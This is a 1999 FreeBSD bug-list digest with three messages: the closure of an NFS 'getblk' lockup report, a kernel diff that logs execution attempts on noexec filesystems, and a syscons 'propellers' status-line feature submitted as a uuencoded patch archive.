From owner-freebsd-bugs Sun Dec 12 0: 9: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7284915096; Sun, 12 Dec 1999 00:09:00 -0800 (PST) (envelope-from dillon@FreeBSD.org) Received: (from dillon@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA39629; Sun, 12 Dec 1999 00:09:00 -0800 (PST) (envelope-from dillon@FreeBSD.org) Date: Sun, 12 Dec 1999 00:09:00 -0800 (PST) From: Message-Id: <199912120809.AAA39629@freefall.freebsd.org> To: toasty@dragondata.com, dillon@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/7727: Processes get wedged in 'getblk' on 2.2.7 NFS client Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Processes get wedged in 'getblk' on 2.2.7 NFS client State-Changed-From-To: open->closed State-Changed-By: dillon State-Changed-When: Sun Dec 12 00:08:22 PST 1999 State-Changed-Why: A large number of bugs relating to NFS client lockups, including at least one relating to a lockup in getblk, have been fixed in recent kernels (3.x and 4.x). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 2:30: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D80F514DF0 for ; Sun, 12 Dec 1999 02:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA47028; Sun, 12 Dec 1999 02:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from garatu.we.lc.ehu.es (garatu.we.lc.ehu.es [158.227.6.222]) by hub.freebsd.org (Postfix) with ESMTP id E4D1814F83 for ; Sun, 12 Dec 1999 02:22:02 -0800 (PST) (envelope-from borjam@garatu.we.lc.ehu.es) Received: (from borjam@localhost) by garatu.we.lc.ehu.es (8.9.3/8.9.3) id LAA21435; Sun, 12 Dec 1999 11:22:01 +0100 (CET) (envelope-from borjam) Message-Id: <199912121022.LAA21435@garatu.we.lc.ehu.es> Date: Sun, 12 Dec 1999 11:22:01 +0100 (CET) From: borjam@garatu.we.lc.ehu.es Reply-To: borjamar@sarenet.es To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15435: Attempts to execute programs from a noexec filesystem should be logged Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15435 >Category: kern >Synopsis: Attempts to execute programs from a noexec filesystem should be logged >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 02:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Borja Marcos >Release: FreeBSD 3.3-RELEASE i386 >Organization: >Environment: (irrelevant) >Description: The option to mount a filesystem as "noexec" is a very useful security option. However, for it to be really useful, attempts to execute programs from filesystems mounted as "noexec" should be logged. It could help to detect the use of exploits for security bugs. The included diff (to kern_exec.c in 3.3-RELEASE) logs the attempts as kern.notice messages. Perhaps this should be controlled from a sysctl variable? >How-To-Repeat: >Fix: *** kern_exec.c Sun Oct 31 00:50:32 1999 --- kern_exec.c.new Sun Oct 31 02:05:55 1999 *************** *** 34,39 **** --- 34,40 ---- #include #include #include + #include #include #include #include *************** *** 678,691 **** /* * 1) Check if file execution is disabled for the filesystem that this ! * file resides on. * 2) Insure that at least one execute bit is on - otherwise root * will always succeed, and we don't want to happen unless the * file really is executable. * 3) Insure that the file is a regular file. */ ! if ((vp->v_mount->mnt_flag & MNT_NOEXEC) || ! ((attr->va_mode & 0111) == 0) || (attr->va_type != VREG)) { return (EACCES); } --- 679,699 ---- /* * 1) Check if file execution is disabled for the filesystem that this ! * file resides on. In that case, log the attempt. It can be ! * part of an attack. ! */ ! if (vp->v_mount->mnt_flag & MNT_NOEXEC) { ! log(LOG_NOTICE, "UID %d tried to execute %s in a noexec filesystem", imgp->proc->p_ucred->cr_uid, imgp->fname); ! return (EACCES); ! } ! ! /* * 2) Insure that at least one execute bit is on - otherwise root * will always succeed, and we don't want to happen unless the * file really is executable. * 3) Insure that the file is a regular file. */ ! if (((attr->va_mode & 0111) == 0) || (attr->va_type != VREG)) { return (EACCES); } >Release-Note: >Audit-Trail: >Unformatted: non-critical kern To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 6:10:27 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 03C6C14DDF for ; Sun, 12 Dec 1999 06:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA60090; Sun, 12 Dec 1999 06:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from baryt.rz.tu-clausthal.de (baryt.rz.tu-clausthal.de [139.174.1.78]) by hub.freebsd.org (Postfix) with ESMTP id 1884014D65 for ; Sun, 12 Dec 1999 06:09:02 -0800 (PST) (envelope-from inof@baryt.rz.tu-clausthal.de) Received: (from root@localhost) by baryt.rz.tu-clausthal.de (8.9.3/8.9.3) id PAA04125; Sun, 12 Dec 1999 15:09:00 +0100 (CET) (envelope-from inof) Message-Id: <199912121409.PAA04125@baryt.rz.tu-clausthal.de> Date: Sun, 12 Dec 1999 15:09:00 +0100 (CET) From: oliver.fromme@heim3.tu-clausthal.de Reply-To: oliver.fromme@heim3.tu-clausthal.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15436: syscons extension: "propellers" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15436 >Category: kern >Synopsis: syscons extension: "propellers" >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 06:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Oliver Fromme >Release: FreeBSD 4.0-19991204-CURRENT i386 >Organization: Clausthal University of Technology >Environment: FreeBSD 4.0-19991204-CURRENT >Description: The attached patches implement an extension to syscons called "propellers", along with a status line. The following is an excerpt from the (patched) syscons(4) manual page, which describes the extension in more detail: ------ [BEGIN EXCERPT] ------ Propellers are a useful feature to watch for activity on all existing virtual terminals. When using the SC_PROPELLERS option, support for a status line and so- called ``propellers'' is compiled in. The other SC_PROP_* options can be used to set the default look and behaviour of this feature, but you can also change all of this at run-time using the vidcontrol(1) tool. A propeller is a character sequence, usually consisting of the characters / - \ |. Propellers are commonly used to indicate activity (the boot- loader uses them, too) by cycling through these characters. The idea to implement them in syscons was inspired by the old DOS CU/TCP telnet pro- gram, which used propellers to watch for activity in multiple telnet ses- sions. When propellers are enabled, a status line is displayed at the bottom of the screen. This means that the usable area of the screen is reduced by one line (e.g. in the standard 80x25 mode, only 24 lines are available for the actual terminal). Propellers can be enabled per terminal, so you can have a status line on some terminals, but not on others, if desired. The status line is divided into a number of fields, each of which belongs to one virtual terminal. The number of the terminal is printed at the left of each field, starting at 1 (just like the function keys used to switch terminals). The actual propeller is displayed to the right of the number. If output occurs on a virtual terminal, the propeller of the correspond- ing field in the status line cycles through the character sequence, as explained above. Additionally, if a beep occurs, the propeller is dis- played with a different video attribute (the default is light white). When you switch to another virtual terminal, its propeller is cleared. At the right of the status line, a certain number of character columns can be reserved. This reserved area is not used by propellers, and it can be written to by userland applications, e.g. vidcontrol(1), or propclockd(1). ------ [END EXCERPT] ------ The patch set consists of three parts: 1. kernel patches 2. vidcontrol patches 3. new program "propclockd" I have tried to keep the new kernel code as much separated from the rest as possible. The new code is in src/sys/dev/syscons/scprops.c, the modifications to the existing files are appropriately #ifdef'ed. The new kernel code is _only_ compiled in if the SC_PROPELLERS option is defined. The new code for vidcontrol has been handled in a similar way. The new code is in src/usr.sbin/vidcontrol/propeller.c, and there have been only minimal changes to the existing code. Instead of burdening vidcontrol with a dozen new options, I decided to add only one option (-p) which is able to handle all the new features on its own, and I think this is pretty clean. (Of course I'm open to suggestions to make this better.) "propclockd" is a very small and simple program which can be used to exploit one of the new kernel features. Actually it's intended to be just an example of what can be done (and how), but it's useful on its own, so I think it should be included. Everything is properly documented. The patches include additions to the syscons(4) and vidcontrol(1) manual pages, as well as a new manual page for the propclockd(1) utility. The new kernel options have been added to LINT with some comments, too. Note, however, that I'm not a native English speaker, so someone should probably proofread the textual additions of mine. I have started programming these extensions back in the old days of FreeBSD 2.1, and me and my friends have been using them on a lot of machines for years, literally, so I would regard them as pretty stable. I'm submitting them now because I'm tired of updating and merging them every time a new FreeBSD release comes out. :-) >How-To-Repeat: n/a >Fix: begin 644 syscons-diff.tar.gz M'XL(`.2C4S@"`^Q;_W?:2)+/K_BOJ&1W$C`8@^TD$SOV#@8YX1:##W"^O)D< M(Z3&Z"PD5A(FWIWJ&]N93*KS MP)];KF]=VX_^B$^]5GMQ<`"/@#ZUS+]0?U'?KP.\K.T=O*R_K+]XCDU[^[7] M1U![]"_X+,+(#``>!;X?W=5O.17"??1O][%1_[#37000!M;N(@RJX=CQJG[@ M7.V>F]=BXKABY572NK6SLW/'H,)P(:#KW\!^#6HO#_?V\#^HOWKU:JM<+N=3 M+`P6'K2$A?J'^O[A\_W#VKX<\M-/L//BH/("ROCW)?STTQ84YO.Y#;_(+ZC# M*)0/@6]9D8O?RX74K.4KZB6_+=4_]FAV;8_QX2XQI&0V2"2GPP;AY/0L#*<+ M^`_30ZN'6OVP5L/_<-$O:^MRRANMBVSO^] M.=9DLE4>])L#O:5J;96WRLVS3N/-`,K'L//>=%W8,;W0@9VYL$TO#T.;?(>5]79].9P2T07^'=B]]! MO5K_NK[TWM^FLQ4*&;T='![LK>GM98T55_WE"?^!IC^_1:ZF$12M$O>&GNO< MB`#.`G\V0W7XKNO\-.&'JN7/3N2X!FJ1QX40B%`$-\*N:F3[PG;"*'#&B\CQ M/5;((A3@>!#ZB\`2W#)6NO6#65B!I1--P0_X7W\123HS'[7C6"91J8`9")B+ M8.9$D;`!UW[CV/@EFN(>C*8"*;FNOW2\*[!\SW9H4"CIT,B9B`[E4[V:83`$ M?Q)S9OEHA#-TX;BPR$2.B;(Y]F_HE1*6)(,?ST?S%17LXX3@(D4BE$[.RUSE M#*>U7-.9H83-,*'#?9P`Q[N.)Y@=)LF.8>%),<0BAKUU_I%/39PQ_R@B>X%K M^L.6(,63T+)]:S$37F3&6M]%A?K8(X"9&8G`,=TPU1MKG$CK2]&M:/BV/8!! M[VSXOM$W`+^COWG7;ADM./V(+PUH7`[?]OKPZZ^-`;Y^]@P:W1;^_Q&,#Q=] M8S"`7E]2:I]?=-HX#@GU&]UAVQA4H-UM=BY;[>Z;"IQ>#J';&T*G?=X>8K=A MK\+TUX=)A+.S60J<9IQY!$<6FM M=M]H#HE]]2VFTD3)(#^="@PNC&:;OA@?#%Q!H_^Q@I*`9J\[,/[S$COA2V@U MSAMOC`$45^4@J66%@8)O7O:-<^(1%S^X/!T,V\/+H0%O>KT6R1D&1O]=NVD, MCJ#3(\F?P>7`4,RU&L,&LX!T4$C8AY9V.6BSN-K=H='O7UX,V[UN"=[VWJ,L MD-L&CF^Q7'M=6GEL$T:O_Y'(DUQ8]A5X_];`]CZ)$ADWK<'1@GUU1Y0AS8S@&:`$U^R!$A%R!]^ MS3'5"FL3VF?0:+UKTRK4"#2"05L9#(NQ^5;I03?[/Y\%0IP.6H=_CAM;-CEV M,1OC1MK?JRC,4VU%)-"+9J?7_&L+ZMC2(YN M>0L1[E_>VZYO8L1$CV]>";6?@5#-(F1?).D-/G9[%X/V@&G*II8Q:/;;K+2M M\I"=`+W"3>PZT2V@,S'!-L7,]Z2#MM&;6E/T;4X4"G<"%%)XLH@\NF>ZQ,U6 M.5A(;T9OQJ9U?17X"\^N`K2CF/>07UJ+($!7(Q=2Q!%OWQZ>GV^5R?^948FH M5<`A/RH"\2P$X?F+JRF$;<-D? M$#G.&)10;:L93 M#*P&R-F,/;N/@C''KM"6ME7FM=%K)0`E-2*=V`U.&8D9R^U0K;G:<@%=.W(2 M!3ZBO#F@\O$O4CFNUV+!3'BYON?>PM(D!?J`ZY"F@,0KJY*7,WL"O]*0K?)8 MP'.PIF9@6F@YH5PB"I)#O.G=(F9@L>(J0RE="U'5F$*?-W&N4.;VT59Y[@HS MI&DFK"(I18UW%&111K8S%Y!KJ12RB[D98,!&O=!VY:OPO>6O\TO+7N!6_K-9F8[&[O;)5A^YO@+0[+1[>PS2\?`MLBF8>` MMD@F1;;X\`#`%JD\!*Z59.X/:['_PZ#:!^`_!K62U,-@6F4[]T2T@Z]`6J3T M@(@6J3T8H"7.[L"S@_L!6J;R4'@6B3T@G$5J#X1FV1P>`,PBG8?#LED;_38H MJZQ=![*PO4MEGEVU#VA?,D1$7WP+H3/#@$Q!SU4>$993QYHBD$'\B!L)-YI$ M?9/`G(FE'UPS&0]!<1B2?T`0,5]$Y(@G"Q=WL$2!*F1O@G),0X-SVCXE_J@( MA=-)[FZ)/C',\0C\-:",0*1A2_]BNNZM-)5-^+.(;IT02`3UF@9F2HA8,?:[ MH9]@72:3!:HQ7M<8SD.9*:R4TGFB4,P*JGR"$B(`A$1T;!FC)2E$D@BC`7D4^&:)%-@&F;\RA.@%`I1,P32VF'-(&* M]I[XC+8\MY%J-=DZ?THJI&%D.WYU>I)I5EEDQRPY?U)+_#-GZ_^?E3SC(C4OX\(L(D MN%&$:&9YE':*9K`=S52;[2]H:Y'9_[S_B1?L)8GRB)JEM$@,,ALOUBM0_\J* M94^YN'ETAYR)5^Y%J6'QZ*@$M)J"/C\.U+5;+,'),7H]&E3`1>!K6F6Q>]GI M,*4"KPV;<1>9+K][B@WR'_G#^ M!-W5+!G'R]>84GQR.W)'3>;-59'^K<"^9#'N4PCGN(NB23PGSH)LN,*+&TH5 MV8_0XA/XX:"Z-\'9626U3W+^PA?Z^R5F)<<@!\:0ED#V&*7:N"'W!*R;%P0Z'U?;'6 ME[M]H0WUZ/OG_\OY;U65//ZH.>X\_Z_O[[U\N1^?_S]_\>(EMM5?U@Z^G___ M*SYQ88CP@"UN=I4IR/I0:%'@".]3$H,_CT9QU*`W]&X"W4$33J"F M'FTQR1Z/99/1N1F8LYPDE8ZN9OG)ZR2ONW/EF>Z-&>2\H[MA.2R7$Z:N9:4W167)2[;O9%#I^.[=V%?!>([`2/6-YRCXH/LIB!\W^ MJ-5^TQX6[5*AB!%VYR2TZ/]@-#/G/V,KICO/:L\H4=TJ1[=S07+'=*A0W(X" M*K2$8O3?_K@$11K#U^&VD4P%]$>GQ%DH/3H64'I?"*V1S"!C(C?1;;A&1)\" M:)JCA`KQ$!/A!(USH:]RD3,Z$([G?-M0E4W=8^VJ\-G&F3!,4$)-H8&("-?% M)[5+OB\6.MBH91,P@$9JZW<5&*-(ER4<+(D6)< MWK!0O>,1MLU=S.R?IKP2&#B2/4)_$EDC'D?%!FF*<47#J<#<5Y6?=/32L3'& M4F?)@66Z=#(;"?F&[+ETE,YO"PS$_FUQ[NJMQ#8V55#FIZ-SX[Q',87G^$P5 MCPK5%*@Z49&2E.K$1!O.&,Y,J,S'L9Y+NV%5)L2*N(59=L#4]6U5^[Q7^R2; MF&_&$"/+=_T@)=_UE[`,G$A:"AH$>`NZ`8(@DO*+B*`*SUM74W(-QD%QU([` M@==,GG85/I7+JIJ!0L0.#M4;5Z68E$FHQXFV?DS'LP+?23F/,3%7`O#SVV]( M_.0X[8`\RU+`.!#F]1$MS)^H,BJC<6%?":V&P*-?J>J!E.%\$5DL0F2MHGDL M[%NF,LTNU1)D#898V"357'JR9+1.\X>$YITDOZR8XWQ*=PJ.8:=^M-(^<H,/ MS7?HY))1G`0H,&&]H^$"(/2G0QR->X];C MNG!"@7=2.@'D6<6:(6@U>6=F?BYJXW=3MI]G9=>DJ^EI"/[U5P0_-GY1#L(VV@T`FPZ)LGV*)7T`CIR%-NC4X+C8Q4G M95%DEIECE.AS<1=*_Z9W9Y>E^M-:2,12P#ENAUS3"D9'MDJ9X>7R MIT_WBUZ[?%00'U('OC]3ER,SN&;ERAT[I0V+N3_C$@7=BTNUFX?]2R.S:0?6 M5-@+=;J<6(R$TX'8647.U97+!^GM`7-"Q[=FB]THO8/)U[0`9"`$=W"J4O)FAVLOI$Y^@8?!)$H"4`9->RCF&B MP$PJUZ',_K9P`F'G0_Q`$=Z$\C=B^'Q?I>\E="2/UW(8PI.KR4*5K$H>2!ZK M0S(IASB6K*$H#38IPTRRE21!N&.@`FC*K)/SM::/,E3'H$J<^JV3.%:0+5;4 M$'5](E7-9*5F!9P?XUUR.;/Q3DM0R:5@%:MIFQ#>W+.;ME5Q(_YZD0X7"SLY=3"1">T^U M<;)&%!%!'MMG0,E)$DM$LW8UA'0!Y)TJ"$XMD\KKOI?C%7%WOX!H;2U:IRUC%Z M%L=K!OE%P^DX5:Q2>1ZK:M'LKM#E3!Q5B<;U*<"]9*8T$^-[T-AW+&+F>*QF:S28`,YX+'L"^/ZW_7MJ%40`/]N3L'LTK. M&.HKVV;-X2?FQ,S)/IA=S!PK\!=S>1E"PR5F&*VF$W?NPXVV*S? MK*"RQ":K*VD'KRW&P5PN"N=TU(*@3F:B2W^!?\=$;9)<;=-4K2;A6:T`-^]= MD?5>U;?[5J`X(''*J)`S(S4L;214R:*0 ML%4OQF4*/_L56"MX(PV&I'(K.[1$[`-_RM26K%-&0U M$]&T=2TWL`3)>H&':I!%3A5D*2CU`DPAKC*I[AC?;YS0H>MI.+"D7ZX5GIIH M.15\?)J)Y1ST<0I,LQ%#4?@N.E513E;]:(LRFQ,KQ$@](GAQJU3I5WB[2CTVA\)283QW*$9]U"49#_)KN`T/7EW=/]'U]4 MLLD!PR\B\`$)!5-AVJ4*'Q%@2D._8DLO**,&2$1Z?N'[U\AY1.PN M2>DF-C'F\1<174AVY&C4"MV]X'MJ`=^2-O6T?S4%F5._#?E'W(86")K+Q,<1 M/NAW*%%@-Z:K;E:F"0`\/B;SU6HCF]("A1[8OZ5X;RU8K]Q`Q(=J=,/WW^+R M9A+'U0N]KJ*Z+ZC_3DYW?O$:]4\?56[16/D2WZZ#S-P[^5.3KZOK\V^8<0=T MQD[@U5WSKY274L=/2'6E:OXI"28JE,QS0\FFFGH*EU![=Z301WJ")3=4$4+*@.MLEAPT!$_$/:-+Y( MG\D_S%05$?JQ0I*O9Z\1J9VG*OI?\=KK98!_9@^N[38"Z8\W[3..G6E-*7$! M,G6G."_O7B=.-C]/B\U`/TEY,*/YO4H>L+_KT.]()+26=:TV7XC,@ MET`IOAGY7ER2)YG L%P!A*1TT;LX*DYYV;+A9F*JJ,I-9.*I*K!P8F;<-^ MT1/+"OBN72+_4?B%+[7#/PJ%Y%$Z0['\TY]&DRNZ&DW`.'D^@?KSDNI82%J/ MH8@DT8AJGVL3]$YP<@(_'JW1&V?HC7/IC5?H36J*7GWO2':C-\27;_`JIR6BMI1I-$_1VUW2UH]YK#3IA[2",OD,?!#+'==H127HSH M]`ZLF8V`Q+3M`/,=U($IK864%T-;@J')-7X+DZ*<(P6.E^FO*3AWXF]).]6: MN9F^)*UT",FM]"7.GZ2%CV:^+2KQ@\J\:%J$0Q9Z*>2UX M^BF&!C/D'I+[7G)(VM`YWRZ1&-(B!C>C7Z*L[/$=/R#1PSL8[>Z[1B?V_EK= M(<+M\;_M?6M;6LFR\'S%7]%QSDY`0+DJ8IQ]C)*$,T:S19/,D\E#%K!4)@AL M%D8]D_SW4[>^K!MB9F:_L_<[/HG"6GVI[JZNKJJNR[P[\#_S":);URK,W;AI M1JB,>L[O@UDO#6MI)FL2..XG!GWH2W1[T1,I.C3[^02X-EYYX MMVV9?.-OL>2BN$V8A8DULMR2Q;JD6]/PT_"5:<;935`^.NY':0-W]EW2R+!B MN%M';Y<\`+=*:%!Q37X,3ELN!$04AH1BSKPF=L[Z"3-68TQRGUJ=;VIRT39P MFEV^N-U!3YW./K$@QDM($!PO0?PYDT:LR#W,IZ)K(`)HW85*!?KG.@DQRRZ- MLN:<--6GCMSM>\$=\7JH.1^#0$D.L'S@F@K$;MQP8`R,6S&\]4=H:NX;Z1`Y MQ!O?^U0T=<9^8**O#'PT?"2K<38=+!"OJ%UGI89K3\9M-XM9BLD!O"P(M>BK MZU$,%U.%+4YZ@`0$-@F:UN$S"S+(S+<@#2,6>D\/+5GGOOOV@6#Q;ZI"QTQ/\F:9@&R_^ZH"[)A,NI:(T=9$WQBUH3%C^B:X-.% M:X(%OI'?Y[;UE0`+GXNN"R)":4(;O:7:<`51IQ&^-@`P5+P1YTIA`1A!"O66:B`*PKV;W6!6\.?&+*TA"6-'8=%=5&)%6K/" M/;=+T4HXR874RZKI>;]RCP>K*4B.J'O7%ZK24*5*LX9AR<(! MJ1?TDGD^&[(7:TF5:LURO5DN62_6^A:&IH;?')I:6XW.V*.@.\]DH*'N_'9. MWW?<$FBKT.U1]$&G'#^(%[0E\*MU*@@,O"?;$D]#'RZ0U.T58+)R6^5"]N+IFAZ.UIJBJ#N*"F%GP7[G*2ZL%%VD*V2`$+C?[5>9!:<%=[BQQVY/"'Z! MP"^7:#.5RV4=Z-U%C(+]KJ%3[GIK:.S2.C62H#&/W98=:,K;!$VE]B!H/H>A M^?Q[05.M$C35;0U-UNX@M9;#&N/)5%>^F%FHL@:QW7)Y>FX1.MQ&-H+%\;.KCQ\10-M-H)PME'1=A*$-^%-_Y%:5OD"@J;YX+A*R7UJQA&UO@4(G=Y!*J2)WMQ/:Q:T'W>=XK"$S\ M6Z`BB#0?$/*6B+45,?O2)EXF@`1\ MA:$_`/.G@(`M/UW%9:>KB#U@LP@*K$E17)6F[.-(-DP3M*"=91\+OLYX]G([ M#`0P+C^@A6<^3T^YC4S?UB=?I<@"P&QC*2]4RDLHE5\:GDH$(*U)9KA@0?A# M1:M/HQ#J):32HAZ-PA"+RLKW+2TFU'**RF;LN](6OGOZ M%-YQ.^X(K^?H^^".$`E$07E<%BA$YJL2K6W1>#Y@((IL#-,CTR1('W)/I(JA ML<6J56P]A?TCD4+R5VDT\*"NEAK"$V6NX3!`UR0FF.^KE0\:B\GRGC_>,K)C MP$#ZL$,.]F/QL#\Z[CX[Z_QT>'S\6N^$V;S?Q?O%'#"?2Z".$3V7,4K@7.G""`=)Y76>=E';7>90=CGM9 M6RVO-G.\!1JY'$I4P\$([P$5U)&UI46J5@KE&JQ2O5XHUV69Y!)#X?2\.C[K MM+K[+_=."KB)%"&":W?I;A_VXPW5B1,>731'Y`D=)=OO7K6:ZLJ[(P/B:[J+ MH(.1)J.XH#N-->*Y$.H;WE60(17CS#0P0DWDC-?(G7HJZ@E-RLO&L]7@:"[J M$?50Z*QU^=+@\4ER:\"[->"M-7+$HB^&J!P'I%R@5;\7D#(OV;(C3NZL2FOR MD%'KGD4SL_S*_&9`S7W>`R$EBO4]'1VLZ=@[/)7&VQ@_A??X!@6:PJ0!%QA\ MB(-*S28W8XEY/YTRJWB!MJUDZ3I1GWQ_BB::,Q^XW1[M:-K'M5JC4*ZJ?&VK M4JA40G(S$BSF(47P^5/QD%;Z^BT\I&(F,M38OX*)'.Q$'J"D#H"NM667:*H2;@M'`.?&3?;%P7[[X%T!C[U2J9[;(6TP[A6^62X5Q!N? MO_$VC%>L2D54"*O9!"T1-HQ4%_CD'YA8];Q4EJJ`#1MHNS#7:3BH/.G_,8K$ M'R-E6%\P>A"5'(8B-BR0!X9.T-P[U\TCU]" M'G]'%Z\XQ1N)Q;>H.&V%[3(Q-/4*,3;,T&R0$X//.6=8!\`+$EY!@NP+X4!L M&;DXVM<,Z`P\1V^CK$'3]REBV#`7V4T2.'91]?`<)M17(J[]PEY_O^@X`*80 M+MA7&L5D?A@%V7#4\`< M41C*KZR!+Y?HJ*S7RNE'Y><_X5'Y^?<\*C__?WI4UBNU0AG$TOHF_-W\ZZA$ M`E"]]ZBL_LN/RDCY\W,B4W$Z]=>1^HV>L7*\O1G?KZ^NN)W3$.IGF\.[*N]7FUW:M09N[G#Z/-8::31L^WDD\[F.&"T M@Q4S3#NQJ\(J(W).B^,+DF"]A*EUI90HR"E0QP3@]ZY^'AA01;XKT MDY?E*85%^`(G''__P52X]#&J0@XIZ%VD+7Z52I%T%XF$A]HJ%D,['7\0V^>3 MJ3BMJP!MK`H*SBG:-:1NQ`6?CN;SNZR+=-\Z+/X(-AMM2@(S%:]+S9,(IH.D)S`7^D06%:;G-!CG-SE>V>%X: M6WI>;+`6/FI*.\ZS6W8S2,859]_]3AC@MEBT3?9MF]$!(QF`SC$N[4[DL43' M4L^/CTYAR8]:.U$DZ/S4(24SW^S4&S@SU:W2XHVRT7"VBK-34C?#!@+#Q.SW MW!7,%+F0`1/&C'F#MVT8#'A+3:UI<&C_1BPQ22-4(A2I50S%T!W_SELH_R?8 M0NHA6VBYDV'>2S\6\-V]9P(6^B:+2JIX>NW3::"V\"2IE>&?>QH0K\I_<&G9 M8"9TXV[4&?"G[*IP0F\J_&8^<50[I-`I:JX#%@:#A]#E#(:4?G.R]ZKU[.SY M\]:)84)3BCZ/%67N`OLEL::+$=B1T8B4%@&OAR/ISB?#239BGL%C(C,., MMES:)#8`_E3*C@XO0T'H,]DU;3U-IRM:@=D8AK3".8KI`'P3%7`V3MKVE?91 MFY3)K.FMA]X3:C=:IXM^)X`.W>X[S.IP]"+KOK!B0CZSNE'\^>]%\BA.H1N^\/LDP-Z90Y/-[#C!,Y9):=UP?/ M#T^I0`ZKZN0.2(`'(DGG2,9:Z"P++]\U3UHO0$ZE7-U M!\2=;Y6L<"DGLC^;39;99M@%E77"_W-4!/2UI1`('/J`PAXH8ALU^\#U'NT: MKX.<=420_L-(G\0[J0@$)%7>!X):``*1*U0W([VJ;U>TVMGADHQKMQ-1)>2< MS=:Q3MP_F%CW/0=:<`M89F@G/;$*[P/^BSET)G._J2(Q84&@INB4R(%D*0[- M)<7Z@^^/[W*9(5*F%)5^%"M*Y+;BS@$"6P8V+(&/8YR^6<6"0: MQK#\D-=DAO\J8V)T/1X-/U&TL'$7XSC-LKD"NE*C(2\_E>`F.1X#N68C5V8: M8N?KZ-#8?7MAYN^AY2YAXT2U,E$27TK.[,>JL_>F==(].3LZ0KXE1[:*=EO3L85Q M%JW^H%HID0*AB@HEYB3M7O0Q6S-!0R:>)A+BV+^Y%RGE&Q25^%CIV)>2:23\ M:CG_VZ0Z)O(3!LF**!WT0D]&@ZX)9&&.(_H"!*#=.3OZ\>CX[1'-O"G-\^O; M@!CZ)"2FDZ9W>YO.O6JI7A,>*!0J,X9?J!@P@(U\HBH7D_D$S4+1>O:>>8S& M$4L:K,EX0,F/NA@1NHM,%8Z%B1Q\T^4<3\EH!=($DR<)J5O*6^2,5*T@S6=_ MJDP8ASA-HK".+`2&,J?`NE\#?[DF(6%VY#VECMA5YND"Y3AV!J^\Z]%86PF;&HK+HF6&H[-7SUHG.VX!)R*++G72PKQY.H)8HA.S+;Q_=G+2 M`D$"'5!)Z1^JY?H@N"L"Q5&P):W-/][M,XF&4/[9.CEJ'75S^X\-6SA$@*#`V-("IR-&_.-@) MOZ(H`Q3/$[YD]X%?AV[_Y_BD$,(TT3%7J^QY6:W5ZJ).P1^.@J:%$Z.5M#FV M'E.DM[0L6U:$T.FVT,#>Y9D?86).;\9G'/1&J0#T\$G3LG?8/LCEM#+&R6VJ M(]BR%P':XPY-QE:1)S'\C(=Y$K2"YN'5?:FN6*$K3FH`JI*8WW;%;(9^([CE@8B=-!<-J+`95Z[5*H5(-*6/QBES8 M@61H(JJ/UA&F&(V>>#8J5=EJ/]**E!S6*%UGK7XUFGRCNKY?LR]#"7>]9%Z[ M!_($/)#PFW"0T_3WU]$"SK:.QL-W=SBC421]W@+G?I7<.EETW-=N2EVRP(_H M2Q3T?3&[&WZ3'<6/X)A/J10!%PF7"]7\E\M=)%S2_5''GZI*794;S4JY6=Y<[B+A,I15 M?KM9W6S6&O8BH49<._P68W$=Q598HTRFO!E16H[=4XAY9C?OKOL\4ZZXPG>T MLF:EX]7U&]6(:"R3%);?7SO[;__L]/5>Y[1E1Q)^GBF+W$OCK@"GIZU@V5(V MDZ$+U6YYQ,/\V)J.H,'9-"B:/R;H>;*@EA4VV#X>OB;TPI.6+#>@W=>' M'?:;G4S7HU''G*HQLM_<.]D]9!E[4FW:L!F85WYYDK7"F$17)3@Y`Y M!3`H.:@G%S6+64F3J"5CD[-D],0X:`::G#JA.,)8XAC/$W-])-2D4-U2L\(U3>;7=5)9!B96 M?*PR'V92NYH3+-.FQ'RK"!24+T4XM!/1P"'T;\A94,F^_Q%]]GAWOZ/P`X\>]$];+]X>?KBI/53;M%YX2I$ MXF3??1MM'YIN'>5"1B:AEJW:)-ZN?1=M]802[Z2U:30K\2;-*VKQ[EQKC^*V2G6M2NHQ![H;<28*_![2+/[%@*D_QDB=U(A:U MY[DM%,2V'!],QB%`.?[#-AN@54T\)">$UYH.WA5;NLR:\]4M@+4DPE8F$EMK M37^1\N&`6FOVJ]N>*;#F?)4"D=!9:^YW,2O;)-.&>FD376]Q?'0\1&Z,EP[E M;T0AC1)TMQP)YK_C7A^&V<"%5UQL%!-1Y;A)/G8H#X$MKE9;<0%)+=:U,"J%+*SKC8J!8P+`G_JY?!Y^+;[ 